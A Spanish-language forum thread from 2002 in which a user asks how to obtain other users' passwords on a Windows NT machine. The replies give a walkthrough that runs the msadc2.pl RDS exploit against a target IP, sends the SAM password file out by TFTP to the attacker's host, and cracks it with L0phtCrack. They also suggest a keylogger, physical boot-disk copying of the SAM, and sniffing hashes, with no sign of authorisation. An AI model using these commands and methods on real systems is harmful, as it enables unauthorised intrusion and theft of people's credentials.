Como podria pillar los pwd de usuarios si puedo acceder a el como solo lectura?
03-05-2002, 11:30
Como podria pillar los pwd de usuarios si puedo acceder a el como solo lectura?
Sería interesante poder hacerse con el archivo SAM, que contiene los usuarios y passwords en cualquier sistema NT, pero evidentemente está encriptado. El SAM está bloqueado cuando el sistema se está ejecutando, y ni siquiera el Administrador puede acceder a él. Pero hay otros sitios donde se guardan copias de este archivo, uno es en los discos de emergencia (repair disk) si estos has sido creados con la opción "/s" , y otro es en la carpeta /winnt/repair aunque esta última está comprimida (SAM._).
MDAC es la manera en la que el servidor web accede a cualquier base de datos ODBC.
La instalación por defecto del IIS4.0 incluye el MDAC, y el éste incluye un componente llamado RDS (Remote Data Services). RDS es la parte que permite el acceso remoto al OBDC a través de la web.
MS Access maneja estas peticiones a través del motor de la base de datos llamado Jet. El problema es que Jet permite llamadas a la shell del VBA, permitiendote ejecutar comandos con permisos de Sistema.
Con los permisos que tenemos en este momento (recordemos que estamos como usuario IUSER_NT_VICTIMA ) no podemos tocar el sam._ , esto es lo que pasaría:
D:\Inetpub\scripts>copy \winnt\repair\sam._
copy \winnt\repair\sam._
Access is denied.
0 file(s) copied.
Volviendo al MDAC, buscando en internet, vemos que existe un exploit que nos permite ejecutar comandos en el PC remoto, el msadc2.pl (también escrito en perl), para ejecutarlo simplemente le añadimos "-h <ip_objetivo>".
Uutilizamos este exploit para subir el sam._ a nuestro PC, el output sería éste:
[cyrux@net /cyrux]# perl -x msadc2.pl -h 192.168.10.1
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Please type the NT commandline you want to run (cmd /c assumed):
cmd /c tftp -i 192.168.10.250 PUT \winnt\repair\sam._
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: d: Success!
Comprobamos que efectivamente nos hemos hecho con el sam._
[cyrux@net /cyrux]# ls -la /tftproot/sam._
-rw-rw-rw- xx ....................... xx /tftproot/sam._
NOTA: Hacerse con el archivo sam es muy importante, pero estamos limitados a la suerte que tengamos a la hora de crackearlo, otra manera de conseguir los pass del admin sería subir un keylogger al PC objetivo, y esperar unos dias, después de ese tiempo, volvemos a conectarnos al PC y nos bajamos el log con las claves.
Crackeando los passwords.
Una vez que ya tenemos el archivo que contiene los passwords del PC objetivo, tenemos que descomprimirlo y desencriptarlo.
Para descomprimirlo, tenemos que utilizar el comando "expand", pero para ello necesitamos tener un NT:
C:\> expand sam._ sam
Pero si no contamos con un NT podemos expandirlo antes de bajarnoslo, con el exploit del MDAC:
[cyrux@net /cyrux]# perl -x msadc1.pl -h 192.168.10.1
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Please type the NT commandline you want to run (cmd /c assumed):
cmd /c expand \winnt\repair\sam._ \winnt\reapir\sam
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: d: Success!
Pero aún tenemos que desencriptarlo, vamos a utilizar uno de los mejores programas que hay para ello, el L0phtCrack v3 (LC3) , que corre en NT, aunque nos serviría cualquier otro crackeadorr para NT que no necesariamente tenga que correr bajo un sistema NT (es decir, si no tenemos un NT tendremos que hacernos con un crackeador de archivos sam que sea compatible con nuestro sistema operativo, Win9x Me, *nix ... )
En fin corremos nuestro LC3, y con un poco de suerte y paciencia no haremos con los passwords del PC objetivo, este paso parece un poco "fantasioso", porque siempre parece que eso de encontrar el pass es muy dificil, pero la realidad es que la mayoría de los administradores utilizan passwords de muy baja seguridad, y el LC3 los saca en un porcentaje altísimo de veces (en grandes compañías esto no debería ocurrir).
La razón de que los passwords sean relativamente fácil de crackear es que Microsoft, en sus esfuerzos por mantener la compatibilidad con las versiones antiguas de Windows, usa un algoritmo "hash" (encriptación en un solo sentido) para el acceso desde redes Microsoft, LanManager. Aunque el NT posee un algoritmo mas nuevo y fuerte, mantiene todavía una copia del LanManager.
07-05-2002, 03:57
si tienes acceso fisico a la red prueba si la maquina butea primero en a: , si ocurre esto consigue un disco de inicio de win 95 o 98 ( en dicho disco copia el ntfsdos que es un programita que cambia la particio ntfs por fat lluego busca en la unidad que te creo por lo general la unidad d:
y copia el archivo sam que se encuentra en system32/config/ al disco.
listo el sam es tuyo..
luego crackea el archivo con el LC3 ( al cual antes debes crackear para poder usar fuerza bruta) una pagina que te ayuda www.astalavista.com
espero que lo logres...
09-05-2002, 12:14
si logras instalar el cain (o el LC3, ahora mismo no recuerdo cual era) tiene una opcion para ke sake los codigos del sistema
09-05-2002, 20:27
te acuerdas de cual era la opcion y tienes idea si se pueden dar cuenta usando dicha opcion.
grasias
10-05-2002, 11:53
...pero ponte a trastear, no debe ser muy dificil dar con ella (yo solo lo use 3 minutos)
10-05-2002, 22:02
tengo el lc3 corriendo pongo import from sniffer y me aparese lo siguiente choose the network device to sniff on:
y tengo la opcion de elegir esto:
3com 3C9Ox ethernet adapter
le doy ok
luego no se que hacer....
29-07-2002, 17:39
Excelente Post, Giskard!
31-07-2002, 03:16
Gracias por esta clase maestra dada en tan poco espacio...
Marcadores